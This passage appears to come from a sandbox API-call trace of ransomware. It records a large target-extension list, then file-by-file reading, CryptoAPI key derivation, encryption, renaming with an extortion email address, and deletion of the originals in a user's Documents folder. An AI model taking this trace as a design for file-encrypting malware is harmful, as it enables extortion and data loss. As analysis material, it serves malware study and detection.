html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0186.119] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0186.119] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0186.119] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\pacjpuc.ods" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\pacjpuc.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0186.120] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x3560, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x3560, lpOverlapped=0x0) returned 1
	[0186.123] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.123] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcae68) returned 1
	[0186.125] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.125] CryptCreateHash (in: hProv=0xfcae68, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0186.125] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.125] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0186.125] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.125] CryptDeriveKey (in: hProv=0xfcae68, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb98f0) returned 1
	[0186.126] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.126] CryptEncrypt (in: hKey=0xfb98f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x3560, dwBufLen=0x3560 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x3570) returned 1
	[0186.126] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0186.126] RtlMoveMemory (in: Destination=0xfe06e8, Source=0xfdd180, Length=0x3560 | out: Destination=0xfe06e8) 
	[0186.126] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.127] CryptEncrypt (in: hKey=0xfb98f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe06e8*, pdwDataLen=0x18bc0c*=0x3560, dwBufLen=0x3570 | out: pbData=0xfe06e8*, pdwDataLen=0x18bc0c*=0x3570) returned 1
	[0186.127] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.127] CryptDestroyKey (hKey=0xfb98f0) returned 1
	[0186.127] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.127] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0186.127] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.127] CryptReleaseContext (hProv=0xfcae68, dwFlags=0x0) returned 1
	[0186.127] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0186.128] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0186.128] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.128] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0186.129] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\pacjpuc.ods.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 85
	[0186.129] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\pacjpuc.ods.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\pacjpuc.ods.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0186.130] WriteFile (in: hFile=0x2c0, lpBuffer=0xfe06e8*, nNumberOfBytesToWrite=0x3570, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfe06e8*, lpNumberOfBytesWritten=0x18c068*=0x3570, lpOverlapped=0x0) returned 1
	[0186.133] CloseHandle (hObject=0x2c0) returned 1
	[0186.133] CloseHandle (hObject=0x384) returned 1
	[0186.134] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\pacjpuc.ods" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\pacjpuc.ods")) returned 1
	[0186.382] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\pacjpuc.ods" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\pacjpuc.ods")) returned 0
	[0186.382] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeae11d0, ftCreationTime.dwHighDateTime=0x1d9135f, ftLastAccessTime.dwLowDateTime=0x7301bef0, ftLastAccessTime.dwHighDateTime=0x1d9358f, ftLastWriteTime.dwLowDateTime=0x7301bef0, ftLastWriteTime.dwHighDateTime=0x1d9358f, nFileSizeHigh=0x0, nFileSizeLow=0x2fd9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PQfUbbKSg c8n6WQPmL.pptx", cAlternateFileName="PQFUBB~1.PPT")) returned 1
	[0186.382] lstrcmpW (lpString1="PQfUbbKSg c8n6WQPmL.pptx", lpString2="..") returned 1
	[0186.382] lstrcmpW (lpString1="PQfUbbKSg c8n6WQPmL.pptx", lpString2=".") returned 1
	[0186.382] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\"
	[0186.382] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpString2="PQfUbbKSg c8n6WQPmL.pptx" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\PQfUbbKSg c8n6WQPmL.pptx") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\PQfUbbKSg c8n6WQPmL.pptx"
	[0186.382] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\PQfUbbKSg c8n6WQPmL.pptx") returned 56
	[0186.383] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0186.383] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\PQfUbbKSg c8n6WQPmL.pptx", cchLength=0x38 | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\pqfubbksg c8n6wqpml.pptx") returned 0x38
	[0186.383] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0186.383] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\pqfubbksg c8n6wqpml.pptx", lpSrch="help_decrypt_your_files") returned 0x0
	[0186.383] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\pqfubbksg c8n6wqpml.pptx" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\pqfubbksg c8n6wqpml.pptx") returned="c:\\users\\rdhj0cnfevzx\\documents\\pqfubbksg c8n6wqpml.pptx"
	[0186.383] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\pqfubbksg c8n6wqpml.pptx") returned 56
	[0186.384] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0186.384] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0186.384] StrStrW (lpFirst=".pptx", lpSrch=".") returned=".pptx"
	[0186.384] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0186.384] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".pptx") returned=".pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0186.385] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0186.386] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0186.386] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\pqfubbksg c8n6wqpml.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\pqfubbksg c8n6wqpml.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0186.390] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x2fd9, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x2fd9, lpOverlapped=0x0) returned 1
	[0186.393] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.393] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcb5d8) returned 1
	[0186.396] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.396] CryptCreateHash (in: hProv=0xfcb5d8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0186.396] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.396] CryptHashData (hHash=0xfb9830, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0186.396] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.396] CryptDeriveKey (in: hProv=0xfcb5d8, Algid=0x6610, hBaseData=0xfb9830, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9bf0) returned 1
	[0186.396] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.397] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x2fd9, dwBufLen=0x2fd9 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x2fe0) returned 1
	[0186.397] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0186.397] RtlMoveMemory (in: Destination=0xfe0168, Source=0xfdd180, Length=0x2fd9 | out: Destination=0xfe0168) 
	[0186.398] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.398] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe0168*, pdwDataLen=0x18bc0c*=0x2fd9, dwBufLen=0x2fe0 | out: pbData=0xfe0168*, pdwDataLen=0x18bc0c*=0x2fe0) returned 1
	[0186.398] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.398] CryptDestroyKey (hKey=0xfb9bf0) returned 1
	[0186.398] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.398] CryptDestroyHash (hHash=0xfb9830) returned 1
	[0186.399] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.399] CryptReleaseContext (hProv=0xfcb5d8, dwFlags=0x0) returned 1
	[0186.399] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0186.399] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0186.400] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.400] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0186.450] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\pqfubbksg c8n6wqpml.pptx.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 98
	[0186.450] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\pqfubbksg c8n6wqpml.pptx.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\pqfubbksg c8n6wqpml.pptx.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0186.451] WriteFile (in: hFile=0x2c0, lpBuffer=0xfe0168*, nNumberOfBytesToWrite=0x2fe0, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfe0168*, lpNumberOfBytesWritten=0x18c068*=0x2fe0, lpOverlapped=0x0) returned 1
	[0186.454] CloseHandle (hObject=0x2c0) returned 1
	[0186.454] CloseHandle (hObject=0x384) returned 1
	[0186.454] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\pqfubbksg c8n6wqpml.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\pqfubbksg c8n6wqpml.pptx")) returned 1
	[0186.460] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\pqfubbksg c8n6wqpml.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\pqfubbksg c8n6wqpml.pptx")) returned 0
